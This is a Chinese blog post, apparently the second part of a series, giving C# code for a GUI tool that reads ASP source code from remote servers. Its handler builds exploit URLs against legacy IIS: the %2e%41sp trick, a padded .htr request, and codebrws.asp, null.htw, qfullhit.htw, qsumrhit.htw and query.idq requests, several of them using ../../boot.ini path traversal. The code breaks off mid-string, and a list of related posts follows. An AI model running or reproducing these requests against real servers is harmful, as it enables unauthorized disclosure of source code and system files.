一个用c#写的扫描asp源码漏洞的应用程序(2)

最新推荐文章于 2025-08-10 21:48:21 发布
最新推荐文章于 2025-08-10 21:48:21 发布
阅读量504 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: asp c# string object 扩展 url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Ronbi/article/details/2154215
本文介绍了一种通过解析URL来获取文件相关信息的方法,包括文件全名、扩展名及路径等,并展示了如何根据不同情况构造新的请求URL。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导读:
  //主要方法
  protected void btnGo_Click (object sender, System.EventArgs e)
  {
  
  //解析url
  string strServer = this.txtServer.Text ;
  string strUrl = this.txtFileName.Text ;
  char [] point = {'.'} ;//定义分割符为"."
  char[] line = {'/'} ;//定义分割符为"."
  string [] arrString = strUrl.Split(line) ;
  
  //求asp文件全名
  string strFileName = arrString[arrString.Length - 1] ;
  //求从根目录下的路径
  string strPath = strUrl.Substring( 0 ,
  strUrl.Length - strFileName.Length) ;
  
  //解析文件全名
  arrString = strFileName.Split(point) ;
  //求文件扩展名
  string strLast = arrString[arrString.Length - 1] ;
  //求文件名
  string strFirst = strFileName.Substring( 0 ,
  strFileName.Length - strLast.Length - 1) ;
  
  
  
  //使按钮、输入框等失效
  this.txtServer.ReadOnly = true ;
  this.txtFileName.ReadOnly = true ;
  this.btnClear.Enabled = false ;
  this.btnGo.Enabled = false ;
  
  
  if (this.txtServer.Text == "http://" || this.txtFileName.Text == ""
  || this.txtServer.Text.Trim()== "" ||
  this.txtServer.Text.Substring(0,7) != "http://")
  {
  MessageBox.Show("请输入正确的主机名和文件名!") ;
  this.txtServer.Focus() ;
  }
  else
  {
  this.txtResult.Visible = true ;
  this.txtResult.ReadOnly = true ;
  this.barStatus.Text = "正在连结主机…" ;
  
  string strRequestFile ;
  
  switch (this.cboMethod.SelectedIndex)
  {
  case 0: //直接读取
  strRequestFile = strServer + strUrl ;
  break ;
  case 5 : //%2e%41sp
  strRequestFile = strServer + strPath + strFirst
  + "%2e%41sp" ;
  break ;
  case 8 : //longhtr
  strRequestFile = strServer + strUrl
  + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
  + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
  + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
  break ;
  
  case 10: //codebrws.asp
  strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
  + strUrl ;
  break ;
  
  case 11: //showcode.asp
  strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
  + "/msadc/../../../../boot.ini" ;
  break;
  
  case 12 : //null.htw
  strRequestFile = strServer + "/null.htw?CiWebHitsFile="
  + strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
  break ;
  case 13 : //qfullhit.htw
  strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
  + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
  + "&CiHiliteType=Full";
  break ;
  
  case 14 : //qsumrhit.htw
  strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
  + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
  + "&CiHiliteType=Full";
  break ;
  
  case 15 : //query.idq
  strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
  + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
  + "%20%20%20%2

本文转自
http://study.qqcf.com/web/224/24048.htm
Ronbi
关注
C#批量爬取网站验证码图片/爬取网页内容(2
luolan9611的博客
04-09 1846
上一篇和大家讲了怎么用C#批量下载验证码图片,这一篇和大家讲讲如何用C#将网页上的html内容保存到一个本地txt文档里面。其实爬虫这个事情,相信大家可能各有各的实现方法,Python讲爬虫的书超级的多,关于C#做爬虫的....好像很少,我看到了一些比较早的用C#制作蜘蛛程序的文章,在这里我按照上一篇的格式一下比较简单的实现。如有不对,请多指教。 1.C#控制台编程 新建一个C#控制台项目,...
一个c#扫描asp源码漏洞应用程序
04-25
总之,这个用C#扫描ASP源码漏洞应用程序展示了多种IT领域的关键技术,包括高级编程语言的使用、网络安全实践、以及GUI设计。通过对这些技术的深入理解和应用,开发人员可以构建出功能强大且用户友好的工具,...
安全代码扫描:C#和VB.NET的漏洞模式检测器
02-05
C#和VB.NET的漏洞模式检测器- 正在下载 官方版本以nuget包( 和分支)和Visual Studio扩展( 和分支)的形式提供。 可从获得每晚构建的信息(转到Configuration: Release > Artifacts )。 建造 git clone https://github.com/security-code-scan/security-code-scan.git cd security-code-scan 在Visual Studio中打开SecurityCodeScan.sln或从命令行构建: nuget restore SecurityCodeScan.sln
一个c#扫描asp源码漏洞应用程序(1)
黑客攻防 | .net 源代码下载 | ASP.NET开发 | ORACLE数据库开发 | JAVASCRIPT脚本下载 | java源码下载
03-06 623
导读:   这儿就是昨天说的那个程序主要部分的源代码,如果要全部代码请到我的主页去下载。   贴不开,分两次。      //--------------------------------------------------------------------------   //   // file name : form1.cs   //   // description : 主fo
node.js毕设C语言在线评测系统设计论文+程序
月影_计算机毕设
12-28 755
本选题针对C语言在线评测系统等问题的研究具有重要的理论意义和现实意义。 理论意义:本选题研究将对在线学习系统的功能整合理论进行深入的剖析。有助于完善在线教育系统相关理论,尤其是在编程类语言学习系统方面,为如何构建多功能学习评测系统提供理论依据。 现实意义:能够为计算机专业学生提供一个更加全面的C语言学习平台。通过在线评测系统中的学习资料和视频功能,辅助学生更好地理解C语言知识,提高编程能力。同时,也能减轻教师的教学负担,提高教学效率,解决传统教学方式在时间和空间上的局限性问题。
计算机毕设ssmC语言在线评测系统设计n9yvk(开题+源码
华信计算机毕设源码程序
08-22 139
预期成果包括一个功能完善、性能优良的语言在线评测系统,能够为学生提供准确的语言能力评估和个性化的学习建议,帮助他们提升语言水平。研究意义: 语言在线评测系统的设计旨在提供一种自动化、客观化的语言能力评估方式,帮助学生更好地了解自己的语言水平,并针对性地进行学习和提升。同时,对于教育机构和教师而言,语言在线评测系统可以提供准确的学生评估结果,帮助他们更好地制定教学计划和教学策略,提高教学效果。研究目的: 本研究的目的是设计一个全面、准确、高效的语言在线评测系统,以满足学生和教师的需求。
一个c#扫描asp源码漏洞应用程序()
biyusr的专栏
02-26 488
" , "退出系统" , MessageBox.YesNo) == DialogResult.Yes)strResult = strResult == ""?//定义分割符为"."//定义分割符为"."strResult = "错误:" + exp.Message;else //translate:f方法需要建立tcp/ip连接。this.barStatus.Text = "发送请求:"this.barStatus.Text += "完成。
一个c#扫描asp源码漏洞应用程序()_C#教程
生活 技术 娱乐
03-03 288
//主要方法protected void btnGo_Click (object sender, System.EventArgs e){//解析urlstring strServer = this.txtServer.Text ;string strUrl = this.txtFileName.Text ;char [] point = {.} ; //定义分割符为"."char[] l
扫描asp源码漏洞.rar_asp应用_漏洞_漏洞扫描_漏洞扫描源码
09-21
本压缩包中的资源是基于C#的用于扫描ASP源码漏洞应用程序,这为开发者和安全从业者提供了一种工具,以检测和预防这些潜在的安全问题。 首先,我们要理解ASP应用的常见漏洞类型: 1. SQL注入:攻击者通过输入...
一个c#扫描asp源码漏洞的程序
05-04
根据给定的信息,我们可以推断出这是一个用于扫描ASP源代码中的漏洞C#应用程序。下面将详细介绍相关的知识点。 ### 1. C#编程语言 C#(读作C Sharp)是一种面向对象、类型安全的编程语言,由微软开发并首次发布...
c#扫描asp源码漏洞应用程序
weixin_30896825的博客
01-14 111
namespace findbug { using System; using System.Drawing; using System.Collections; using System.ComponentModel; using System.WinForms; using System.Data; using System.Net ; using Syst...
C#ASP源码漏洞扫描程序
"C#编程实现ASP源码漏洞扫描程序" 这个C#的程序主要用于扫描ASP(Active Server Pages)源码中的潜在漏洞ASP是一种微软公司的服务器端脚本语言,常用于构建动态网页。该程序可能包含的功能有检查源代码中的...
秋招笔记-8.6
lastXuanGod的博客
08-06 1840
昨天开组会投文章以及玩苏丹的游戏去了,今天得知不久后有面试,所以我们需要快速地过一下基本的八股和项目。
Word XML 批注范围克隆处理器
最新发布
huluang的专栏
08-10 168
摘要:该WordCommentRangeCloner类专为处理Word文档XML结构中的批注标记文本范围设计,实现深度克隆批注内容块并插入目标位置。核心功能包括:1) 维护文档节点线性索引列表;2) 支持批注块的命名引用和多实例管理;3) 实现节点树的深度克隆与索引重建;4) 保持克隆内容与原始批注的元数据一致性。通过insertAfter方法将克隆内容插入目标节点后,适用于.docx文件的批注内容复制和修改场景。
C# 异步编程(使用异步Lambda表达式)
钢铁男儿
08-09 841
到目前为止,本章只介绍了异步方法。但我们曾经说过,你还可以使用异步匿名方法和异步Lambda表达式。这些构造尤其适合那些只有少量工作要做的事件处理程序。下面的代码片段将一个表达式注册为一个按钮点击事件的事件处理程序。XAML文件中的标记如下:</图21-13展示了这段程序生成的窗体的三种状态。
The Missing Check Logs: An Asynchronous Logging Trap in a C# HIS Project
十步杀一人-千里不留行
08-07 612
【代码】The Missing Check Logs: An Asynchronous Logging Trap in a C# HIS Project。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值